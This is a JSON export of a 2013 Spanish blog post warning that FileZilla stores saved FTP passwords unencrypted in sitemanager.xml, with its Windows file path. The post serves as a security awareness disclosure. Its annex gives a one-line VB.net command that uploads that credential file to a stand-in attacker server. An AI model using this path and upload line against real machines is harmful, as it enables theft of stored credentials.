{"id":4904,"date":"2013-06-07T20:05:20","date_gmt":"2013-06-07T18:05:20","guid":{"rendered":"http:\/\/www.palentino.es\/blog\/?p=4904"},"modified":"2013-06-10T13:35:13","modified_gmt":"2013-06-10T11:35:13","slug":"la-sangrante-herida-de-filezilla","status":"publish","type":"post","link":"https:\/\/www.palentino.es\/blog\/la-sangrante-herida-de-filezilla\/","title":{"rendered":"La sangrante herida de FileZilla"},"content":{"rendered":"

En esta ocasi\u00f3n os voy a exponer uno de los graves problemas que contin\u00faan existiendo en el cliente FTP m\u00e1s extendido en la actualidad.<\/p>\n

Hablamos de FileZilla.<\/p>\n

La gravedad del asunto padece que a \u00a0los propios creadores del programa no les preocupa, la reconocen, dejan en manos del usuario la correcci\u00f3n, y no hacen nada para evitarlo.<\/p>\n

Sepamos cual es el problema. Es necesario darlo a conocer.<\/p>\n

<\/p>\n

Cuando usamos el programa para hacer un FTP, solemos almacenar los datos de configuraci\u00f3n de la m\u00e1quina.<\/p>\n

Entre ellos: Direcci\u00f3n FTP, puerto, usuario, password.\u00a0Pulsamos en bot\u00f3n, y vo\u00edla, estamos conectados.<\/p>\n

Pero no nos hemos percatado de un grave problema.<\/p>\n

La contrase\u00f1a no se almacena cifrada<\/strong>, y no s\u00f3lo eso, aquellas de todos los sitios que almacenes con el programa,<\/strong> quedar\u00e1n expuestas.<\/p>\n

Esa password queda reflejada en un fichero XML<\/strong>, perfectamente legible.<\/p>\n

Cualquier troyano puede capturarlo<\/strong> o realizar una b\u00fasqueda a trav\u00e9s del disco duro y enviarlo a un servidor externo.<\/p>\n

\"FileZilla-1\"<\/p>\n

 <\/p>\n

El procedimiento m\u00e1s recomendable es este.<\/p>\n

\"Filezilla-2\"<\/p>\n

 <\/p>\n

La ruta del archivo almacenado en formato plano sobre Windows 7, \u00a0se encuentra en:<\/p>\n

C:\\Users\\TU_USUARIO\\AppData\\Roaming\\FileZilla<\/strong><\/p>\n

Dentro de esta carpeta se mostrar\u00e1n una serie de archivos .xml y el sitemanager.xml , donde se almacenan las password sin cifrar.<\/p>\n

En windows 8 se muestran en esta ruta, archivos ocultos por cierto.<\/p>\n

\"Filezilla-en-Windows8\"<\/a><\/p>\n

 <\/p>\n

Y repito, es relativamente f\u00e1cil crear un programa que env\u00ede estos ficheros a un servidor de Internet<\/strong>.<\/p>\n

Por lo que nunca almacen\u00e9is las contrase\u00f1as en el FileZilla<\/strong>.<\/p>\n

Los creadores de FileZilla, lo saben, pero su respuesta es que el cifrado debe ser realizado por cada usuario en funci\u00f3n de su sistema operativo<\/strong>.<\/p>\n

Esto es muy “bonito”, pero les preguntar\u00eda una serie de \u00a0cuestiones:<\/p>\n

1- \u00bfQue usuario lo sabe?.<\/p>\n

2- \u00bfC\u00f3mo el usuario lo hace?.<\/p>\n

3- \u00a0\u00bfCu\u00e1ntos realmente lo har\u00edan?<\/p>\n

4- Si fuese as\u00ed, \u00bfd\u00f3nde se almacenan esos ficheros?.
\nQue por cierto ellos ocultan, en una ruta no muy accesible. Poco conocida.<\/p>\n

IMPORTANTE<\/strong><\/p>\n

Cualquier proceso, web con malware, programa no seguro que ejecutemos, acceso remoto o \u00a0acceso a la m\u00e1quina, podr\u00e1 acceder a esta informaci\u00f3n y subirla a Internet en menos de 1 segundo.<\/p>\n

Luego vendr\u00e1n las consecuencias.<\/p>\n

Aviso, tomad medidas,\u00a0el FileZilla sigue sangrando …<\/p>\n

ANEXO:<\/strong><\/p>\n

Subir un fichero en VB.net.<\/p>\n

My.Computer.Network.UploadFile(“C:\\Users\\TU_USUARIO\\AppData\\Roaming\\FileZilla\\archivo.xml<\/strong>“, “http:\/\/www.servidorzombie.com\/ficheros<\/strong>“)<\/h6>\n

 <\/p>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

En esta ocasi\u00f3n os voy a exponer uno de los graves problemas que contin\u00faan existiendo en el cliente FTP m\u00e1s extendido en la actualidad. Hablamos de FileZilla. La gravedad del asunto padece que a \u00a0los propios creadores del programa no les preocupa, la reconocen, dejan en manos del usuario la correcci\u00f3n, y no hacen nada para evitarlo. Sepamos cual es el problema. Es necesario darlo a conocer.<\/p>\n","protected":false},"author":1,"featured_media":4905,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[50,7],"tags":[143],"class_list":["post-4904","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","category-software","tag-filezilla"],"_links":{"self":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/comments?post=4904"}],"version-history":[{"count":13,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904\/revisions"}],"predecessor-version":[{"id":4918,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/4904\/revisions\/4918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media\/4905"}],"wp:attachment":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media?parent=4904"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/categories?post=4904"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/tags?post=4904"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}